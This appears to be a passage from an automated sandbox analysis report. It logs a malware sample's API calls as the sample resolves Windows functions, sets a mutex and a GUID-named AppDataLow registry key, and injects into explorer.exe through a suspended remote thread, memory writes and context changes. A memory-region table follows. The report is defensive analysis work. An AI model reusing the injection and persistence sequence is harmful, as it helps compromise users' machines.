| Module | Get Address | function = CreateMutexA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = MapViewOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenWaitableTimerA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenMutexA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ReleaseMutex, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetVersionExA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateWaitableTimerA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SetLastError, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcmpiA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = InitializeCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = EnterCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = LeaveCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = UnregisterWait, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RegisterWaitForSingleObject, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = TlsAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = TlsGetValue, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = LoadLibraryExW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = TlsSetValue, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetFileAttributesA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenFileMappingA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetExitCodeProcess, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetComputerNameW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetFileSize, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateProcessA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateFileMappingA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetDriveTypeW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = WideCharToMultiByte, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = lstrcpynA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GlobalUnlock, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = LocalFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GlobalLock, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = Thread32First, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = QueueUserAPC, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = Thread32Next, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ReadFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ConnectNamedPipe, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetOverlappedResult, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CancelIo, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = DisconnectNamedPipe, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FlushFileBuffers, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CallNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = CreateNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetSystemTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = WaitNamedPipeA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SleepEx, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = OpenEventA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ExitThread, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = LocalAlloc, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FreeLibrary, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RaiseException, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = VirtualFree, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetModuleFileNameW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FileTimeToSystemTime, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = DeleteCriticalSection, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FindClose, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = GetTempFileNameA, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SetEndOfFile, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FindNextFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = SetFilePointer, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = FindFirstFileW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| Module | Get Address | function = RemoveDirectoryW, ordinal = 0, address_out = 0xafc80 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:40 (UTC) |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = KERNEL32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsWow64Process, address_out = 0x76cd91d0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x7feff120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7feff12d710 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x7fefe590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrRChrA, address_out = 0x7fefe594c9c |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76df0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x76e6bae8 |
|
1 | |
| Mutex | Create | mutex_name = {B29A7695-69BA-B440-8306-AD28679A31DC} |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ntdll.dll, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7fefcef0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7feff12dc20 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ntdll.dll, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\advapi32.dll, base_address = 0x7feff120000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x770b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = EnumProcessModules, address_out = 0x770b1050 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
16 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:41 (UTC) |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyA, address_out = 0x7feff12d6d0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7feff13c480 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Ini, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7feff140710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrToIntExA, address_out = 0x7fefe5bff88 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrChrA, address_out = 0x7fefe5aaf54 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrTrimA, address_out = 0x7fefe5c06a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetShellWindow, address_out = 0x76e054a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetWindowThreadProcessId, address_out = 0x76e00a90 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = RtlExitUserThread, address_out = 0x76f36930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateRemoteThread, address_out = 0x76d1c4f0 |
|
1 | |
| Thread | Create | process_name = c:\windows\explorer.exe, proc_address = 0x76f36930, proc_parameter = 0, flags = THREAD_CREATE_SUSPENDED |
|
1 | |
| Memory | Read | process_name = c:\windows\explorer.exe, address = 0x76f36930, size = 4 |
|
1 | |
| Memory | Protect | process_name = c:\windows\explorer.exe, address = 0x76f36930, protection = PAGE_EXECUTE_READWRITE, size = 4 |
|
1 | |
| Memory | Write | process_name = c:\windows\explorer.exe, address = 0x76f36930, size = 4 |
|
1 | |
| Memory | Protect | process_name = c:\windows\explorer.exe, address = 0x76f36930, protection = PAGE_EXECUTE_READ, size = 4 |
|
1 | |
| Thread | Resume | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Thread | Suspend | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Thread | Get Context | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 717736 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x420000 |
|
1 | |
| Module | Map | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3fa0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ntdll.dll, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\ntdll.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\ntdll.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\ntdll.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Memory | Allocate | process_name = c:\windows\explorer.exe, address = 0xaee10, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 716312 |
|
1 | |
| Thread | Get Context | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Memory | Write | process_name = c:\windows\explorer.exe, address = 0x2950000, size = 792 |
|
1 | |
| Thread | Set Context | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\svchost.exe |
|
1 | |
| Memory | Protect | process_name = c:\windows\explorer.exe, address = 0x76f36930, protection = PAGE_EXECUTE_READWRITE, size = 4 |
|
1 | |
| Memory | Write | process_name = c:\windows\explorer.exe, address = 0x76f36930, size = 4 |
|
1 | |
| Memory | Protect | process_name = c:\windows\explorer.exe, address = 0x76f36930, protection = PAGE_EXECUTE_READ, size = 4 |
|
1 | |
| Thread | Resume | process_name = c:\windows\explorer.exe, os_tid = 0x8cc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyA, address_out = 0x7feff127c50 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Client, data = 2, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x7feff131fd0 |
|
1 | |
| System | Get Computer Name | - |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExA, address_out = 0x7feff131dc0 |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Client, size = 40, type = REG_BINARY |
|
1 |
Process #6: explorer.exe
478
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:48, Reason: Injection |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:45 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5a8 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A90
0x
270
0x
780
0x
45C
0x
428
0x
328
0x
134
0x
420
0x
788
0x
7A4
0x
790
0x
548
0x
7C4
0x
7B8
0x
79C
0x
724
0x
70C
0x
6FC
0x
6F8
0x
6F4
0x
6F0
0x
6E4
0x
6D4
0x
6D0
0x
6CC
0x
6A4
0x
5DC
0x
5D8
0x
5D0
0x
5CC
0x
5C8
0x
5B4
0x
5AC
0x
8CC
0x
8E4
0x
8B8
0x
718
0x
75C
0x
974
0x
908
0x
90C
0x
A04
0x
760
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x0042efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x02052fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002060000 | 0x02060000 | 0x02061fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002070000 | 0x02070000 | 0x02070fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002080000 | 0x02080000 | 0x02081fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x020a5fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x020b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000020c0000 | 0x020c0000 | 0x020c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x020e5fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020f0000 | 0x020f0000 | 0x020f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002100000 | 0x02100000 | 0x02100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02110fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002120000 | 0x02120000 | 0x02121fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x021bffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x021c0000 | 0x0248efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002490000 | 0x02490000 | 0x02491fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| comctl32.dll.mui | 0x024a0000 | 0x024a2fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x024b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024c0000 | 0x024c0000 | 0x024e3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x024f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x02508fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0258ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x025e7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x0265bfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x026a7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026b3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x026c7fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026d0000 | 0x026d0000 | 0x026d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x027dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x028dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028e0000 | 0x028e0000 | 0x028e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x028f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x02900000 | 0x0290bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02910000 | 0x02917fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02920000 | 0x0292ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002930000 | 0x02930000 | 0x02930fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x02940000 | 0x0294ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02a2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ab0000 | 0x02ab0000 | 0x02ab1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| actioncenter.dll.mui | 0x02ac0000 | 0x02ac4fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ae0000 | 0x02ae0000 | 0x02e22fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02e33fff | Private Memory | Readable, Writable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02e40000 | 0x02e5ffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002e60000 | 0x02e60000 | 0x02edffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ee0000 | 0x02ee0000 | 0x02ee0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x02ef0000 | 0x02ef3fff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02f00000 | 0x02f2ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02f30000 | 0x02f33fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002f40000 | 0x02f40000 | 0x02fbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x0303ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003040000 | 0x03040000 | 0x03041fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003050000 | 0x03050000 | 0x030cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000030d0000 | 0x030d0000 | 0x030d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000030e0000 | 0x030e0000 | 0x0315ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x03160000 | 0x031c5fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000031d0000 | 0x031d0000 | 0x031d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000031e0000 | 0x031e0000 | 0x031e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x031f0000 | 0x031f3fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003200000 | 0x03200000 | 0x03201fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x03210000 | 0x03210fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x03220000 | 0x03223fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003230000 | 0x03230000 | 0x03231fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x03240000 | 0x03243fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x03250fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000003260000 | 0x03260000 | 0x03261fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003270000 | 0x03270000 | 0x03271fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003280000 | 0x03280000 | 0x03281fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x03290fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032b0000 | 0x032b0000 | 0x032b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032c0000 | 0x032c0000 | 0x032c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x032d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x032e3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x032f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003300000 | 0x03300000 | 0x03300fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003310000 | 0x03310000 | 0x03310fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x03320fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x03330fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003340000 | 0x03340000 | 0x033bffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x033c0000 | 0x03ceffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003cf0000 | 0x03cf0000 | 0x03cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
